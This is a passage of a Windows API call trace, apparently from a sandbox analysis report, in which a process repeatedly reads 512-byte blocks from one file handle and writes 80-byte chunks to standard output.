(_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.375] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.375] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, 
lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.376] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.377] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.378] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.378] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.379] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.379] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: 
lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.380] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.380] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.380] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.381] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.382] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 
[0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0111.383] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.383] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, 
